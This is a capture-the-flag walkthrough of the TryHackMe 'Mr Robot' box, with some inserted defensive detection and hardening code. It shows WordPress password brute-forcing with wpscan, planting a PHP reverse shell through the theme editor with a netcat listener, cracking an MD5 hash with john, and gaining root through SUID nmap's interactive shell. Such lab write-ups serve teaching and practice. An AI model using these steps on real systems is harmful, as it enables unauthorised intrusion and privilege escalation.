THM Writeup – Mr Robot CTF


Mr Robot

Based on the Mr. Robot show, can you root this box?

Room: Mr Robot CTF

Difficulty: Medium

Operating System: Linux

Author: ben

Mr Robot

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

Credit to Leon Johnson for creating this machine.

Add IP address to your hosts file:

echo '10.10.178.185    robot.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv robot.thm

PORT    STATE SERVICE REASON
80/tcp  open  http    syn-ack ttl 64
443/tcp open  https   syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 80,443 robot.thm

PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

We have ports 80 and 443 open – a web application running under the Apache web server.

Check both ports – port 80 first – browse to http://robot.thm/:

http web app

This is a very cool application.

Now port 443 – browse to https://robot.thm

https web app

It looks like exactly the same web application, only served on port 443.

Looking for first key

Check the source code of the web site – view page source:

page source

At this point I tried all the commands the web site offers, but found nothing of interest.

Directory bruteforce the web application:

root@ip-10-10-40-183:~# gobuster dir -u http://robot.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt


===============================================================
/index.php (Status: 301)
/index.html (Status: 200)
/images (Status: 301)
/blog (Status: 301)
/rss (Status: 301)
/sitemap (Status: 200)
/login (Status: 302)
/0 (Status: 301)
/feed (Status: 301)
/video (Status: 301)
/image (Status: 301)
/atom (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/intro (Status: 200)
/wp-login (Status: 200)
/wp-login.php (Status: 200)
/css (Status: 301)
/rss2 (Status: 301)
/license (Status: 200)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/js (Status: 301)
/wp-register.php (Status: 301)
/Image (Status: 301)
/wp-rss2.php (Status: 301)
/rdf (Status: 301)
/page1 (Status: 301)
/readme (Status: 200)
/readme.html (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
Progress: 2030 / 220561 (0.92%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================

As you can see, I stopped the scan because I had already found what I wanted: it looks like a WordPress application with some interesting paths/files – /admin, /login and /robots.txt.

Ok, now browse to http://robot.thm/login

wordpress login page

Yes, it is a WordPress application; let’s gather more information:

root@ip-10-10-40-183:~# wpscan --url robot.thm -e vp,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.7
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://robot.thm/ [10.10.178.185]
[+] Started: Fri Feb 18 12:37:20 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Mod-Pagespeed: 1.9.32.3-4523
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://robot.thm/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://robot.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] The external WP-Cron seems to be enabled: http://robot.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://robot.thm/e7a3a7b.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://robot.thm/e7a3a7b.html, Match: 'WordPress 4.3.1'

[+] WordPress theme in use: twentyfifteen
 | Location: http://robot.thm/wp-content/themes/twentyfifteen/
 | Last Updated: 2022-01-25T00:00:00.000Z
 | Readme: http://robot.thm/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://robot.thm/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://robot.thm/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Fri Feb 18 12:37:35 2022
[+] Requests Done: 73
[+] Cached Requests: 6
[+] Data Sent: 14.682 KB
[+] Data Received: 17.923 MB
[+] Memory used: 238.102 MB
[+] Elapsed time: 00:00:15

We found out some interesting information:

  • there is a robots.txt file – we’ll check that soon
  • XML-RPC is enabled
  • it runs an insecure WordPress version, 4.3.1
  • the theme in use is twentyfifteen

Check the /admin site now. Browsing to http://robot.thm/admin, we are redirected to http://robot.thm/admin/index.html, and the page keeps refreshing; view the page source:

page source

It is the same web site (source) as before, and I think we are not allowed to enter /admin/index.html because we don’t have the correct IP address…

Now check /robots.txt – browse to http://robot.thm/robots.txt

robots.txt

Hmmm, this is something we are interested in – it looks like we found the first key.

Open key-1-of-3.txt file by browsing to http://robot.thm/key-1-of-3.txt

key-1-of-3.txt

Looking for second key

To download fsocity.dic, browse to http://robot.thm/fsocity.dic

XML-RPC is enabled, so we can try to find the login password using the dictionary we found:

root@ip-10-10-40-183:~# wpscan --url robot.thm --usernames elliot --passwords fsocity.dic --max-threads 50

I have to admit, first I ran this command with username mrrobot and as you can expect I didn’t reveal the password. Then I remembered the name elliot 🙂
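The defender-side counterpart of the XML-RPC password attack above, added here as example code (not from the original writeup): parse Apache access log lines, keep a sliding-window count of POSTs to /xmlrpc.php per client, and report sources that exceed a threshold. The log lines, threshold and window are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache "combined" access log; the timestamp field looks like 18/Feb/2022:12:40:01 +0000
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line):
    """Return (ip, timestamp, method, path-without-query, status) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return (m.group("ip"), ts, m.group("method"),
            m.group("path").split("?", 1)[0], int(m.group("status")))

def xmlrpc_bruteforce_sources(lines, threshold=20, window=timedelta(seconds=60)):
    """Sliding-window count of POSTs to /xmlrpc.php per client IP (lines are assumed to be
    in time order, as an access log is). Returns {ip: peak_count} for clients whose count
    inside any `window` exceeded `threshold`; a wpscan login run produces hundreds of
    such POSTs within seconds, far above what a legitimate XML-RPC client sends."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method != "POST" or path != "/xmlrpc.php":
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:   # drop entries that fell out of the window
            q.popleft()
        if len(q) > threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged

# Constructed sample: one client hammering xmlrpc.php, one ordinary visitor, one junk line.
SAMPLE_LOG = [
    f'10.10.40.183 - - [18/Feb/2022:12:40:{i:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 417 "-" "curl/7.74.0"'
    for i in range(25)
] + [
    '10.10.99.7 - - [18/Feb/2022:12:40:05 +0000] "GET /blog HTTP/1.1" 301 234 "-" "Mozilla/5.0"',
    '10.10.99.7 - - [18/Feb/2022:12:40:09 +0000] "POST /xmlrpc.php HTTP/1.1" 200 417 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]
```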

Go to http://robot.thm/login and log in with the username elliot and the password we’ve just obtained:

wordpress dashboard

Check what role our user has – click Users:

wordpress users

Great news – our user is an administrator.

We know that the theme editor can be used to plant PHP reverse shells; we’ll put one into the 404.php template:

root@ip-10-10-40-183:~# cp /usr/share/webshells/php/php-reverse-shell.php 404.php
root@ip-10-10-40-183:~# nano 404.php

So we copied the PHP reverse shell to our current working directory as 404.php; now open it and set the IP address ($ip) and port ($port) variables:

php reverse shell

In the WP administration go to Appearance > Editor > 404 Template (on the right):

wordpress 404 template

Copy the content of your 404.php, paste it as template and click Upload File:

wordpress 404 modified template

Start netcat listener:

nc -lnvp 4242

Browse to http://robot.thm/wp-content/themes/twentyfifteen/404.php (or http://robot.thm/?p=404.php) and we receive a reverse shell:

reverse shell

Note: http://robot.thm/?p=404.php did not work this time…
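Two checks a site owner would run against the theme-editor technique above, added here as example code (not from the original writeup): confirm that wp-config.php disables the editor with DISALLOW_FILE_EDIT, and diff the live theme directory against a SHA-256 manifest recorded on a clean install so an edited 404.php or a dropped extra file shows up. The file contents in the test are constructed.

```python
import hashlib
import os
import re

# The wp-config.php setting that removes Appearance > Editor, the screen used above.
FILE_EDIT_RE = re.compile(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)

def file_editor_disabled(wp_config_text):
    """True when wp-config.php contains define('DISALLOW_FILE_EDIT', true)."""
    return bool(FILE_EDIT_RE.search(wp_config_text))

def theme_manifest(theme_dir):
    """Map each file (path relative to theme_dir) to its SHA-256. Record this on a
    clean install and keep the manifest somewhere the web user cannot write."""
    manifest = {}
    for dirpath, _dirs, filenames in os.walk(theme_dir):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                manifest[os.path.relpath(path, theme_dir)] = hashlib.sha256(f.read()).hexdigest()
    return manifest

def theme_drift(theme_dir, baseline):
    """Diff the live theme against the recorded manifest. An edited 404.php appears
    under 'modified'; a new file that was never part of the theme under 'added'."""
    live = theme_manifest(theme_dir)
    return {
        "modified": sorted(p for p in live if p in baseline and live[p] != baseline[p]),
        "added": sorted(p for p in live if p not in baseline),
        "removed": sorted(p for p in baseline if p not in live),
    }
```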

Upgrade the shell:

python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg ENTER ENTER
stty rows 24 columns 80
export TERM=xterm-256color
reset

Look around – find the second key:

daemon@linux:/$ ls -lA /home/
total 4
drwxr-xr-x 2 root root 4096 Nov 13  2015 robot
daemon@linux:/$ ls -lA /home/robot/
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5

We found the second key; however, we are not allowed to read it – only the robot user has permission to read it.

Anyway, we found an interesting file named password.raw-md5; let’s check it out:

daemon@linux:/$ cat /home/robot/password.raw-md5 
robot:c3fcd3d76192e4007dfb496cca67e13b

That should be the robot user’s password hash.

Copy the hash to a file on your attacking machine and try to crack it:

root@ip-10-10-40-183:~# echo 'c3fcd3d76192e4007dfb496cca67e13b' > hash
root@ip-10-10-40-183:~# john -w=/usr/share/wordlists/rockyou.txt --format=raw-md5 hash

[REDACTED] (?)
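The file above stores a bare, unsalted MD5 digest, which is why a wordlist run finishes in seconds. As an added example (not from the original writeup), here is the contrast a reviewer would want: a checker that recognises the `user:<32 hex>` raw-MD5 layout, the weak hash form itself, and the salted, iterated PBKDF2 storage that should have been used. The `example-pw` password in the test is a constructed placeholder, not the box's credential.

```python
import hashlib
import hmac
import os
import re

RAW_MD5_LINE = re.compile(r"^(?P<user>[^:\s]+):(?P<digest>[0-9a-f]{32})$")

def classify_credential_line(line):
    """Recognise the 'user:<32 hex>' layout of password.raw-md5. A bare 32-hex digest
    with no salt or cost parameter is an unsalted MD5, which a wordlist run can test
    at hundreds of millions of guesses per second. Returns (user, kind)."""
    m = RAW_MD5_LINE.match(line.strip())
    return (m.group("user"), "raw-md5") if m else (None, "unrecognised")

def unsalted_md5(password):
    """The weak form found on the box: identical passwords give identical digests."""
    return hashlib.md5(password.encode()).hexdigest()

def make_hash(password, iterations=600_000):
    """Salted, iterated PBKDF2-HMAC-SHA256 in a self-describing string. A fresh
    16-byte salt per user defeats precomputed tables and makes equal passwords hash
    differently; the iteration count makes every guess ~600k times more expensive."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_hash(password, stored):
    """Recompute with the stored salt and iteration count, compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)
```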

Great, we have robot’s password, so switch to the robot user:

daemon@linux:/$ su robot
Password: 
robot@linux:/$

Read the second key:

robot@linux:/$ cat /home/robot/key-2-of-3.txt 
[REDACTED]

Looking for third key

Now, I guess, we need to be root to read the third key, so we have to find a privilege escalation vector.

Check what the robot user can do with sudo:

robot@linux:/$ sudo -l
[sudo] password for robot: 
Sorry, user robot may not run sudo on linux.

Check scheduled tasks:

robot@linux:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
21 * * * * bitnami cd /opt/bitnami/stats && ../agent.bin --run -D

Check executables with SUID bit set:

robot@linux:/$ find / -type f -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

Now we finally found something interesting – the SUID bit is set on nmap.
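A periodic audit that would have surfaced the stray setuid nmap, added here as example code (not from the original writeup): walk the filesystem for files carrying the setuid or setgid bit (the same population the `find` above returns) and report those absent from an expected baseline. The baseline set is constructed from the listing above; a real audit would derive it from a clean image or package manifests rather than from the target itself.

```python
import os
import stat

# Constructed baseline: the listing above minus /usr/local/bin/nmap, which no package installs setuid.
EXPECTED_SETUID = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
}
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}   # pseudo-filesystems, not installed software

def setuid_files(root="/"):
    """Yield (path, bits) for regular files under `root` with the setuid or setgid bit set,
    i.e. what `find / -type f -perm -4000` (and -perm -2000) returns. Symlinks are not
    followed, so a link pointing at a setuid binary is not double-counted."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:          # vanished or unreadable entry: skip, as find does
                continue
            bits = st.st_mode & (stat.S_ISUID | stat.S_ISGID)
            if stat.S_ISREG(st.st_mode) and bits:
                yield path, bits

def unexpected_setuid(root="/", baseline=EXPECTED_SETUID):
    """Sorted paths carrying setuid/setgid that the baseline does not account for;
    on the box above this is exactly where /usr/local/bin/nmap shows up."""
    return sorted(p for p, _ in setuid_files(root) if p not in baseline)

if __name__ == "__main__":
    for path in unexpected_setuid():
        print("unexpected setuid/setgid binary:", path)
```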

Check GTFOBins:

GTFOBins nmap suid

Ok, this is the way we can write to a file with elevated privileges, but we need to read the key…

First we have to run nmap in interactive mode and start a shell:

robot@linux:/$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)

As we can see, our effective user ID is root.

So find the third key and read it:

# ls /root
firstboot_done	key-3-of-3.txt
# cat /root/key-3-of-3.txt
[REDACTED]
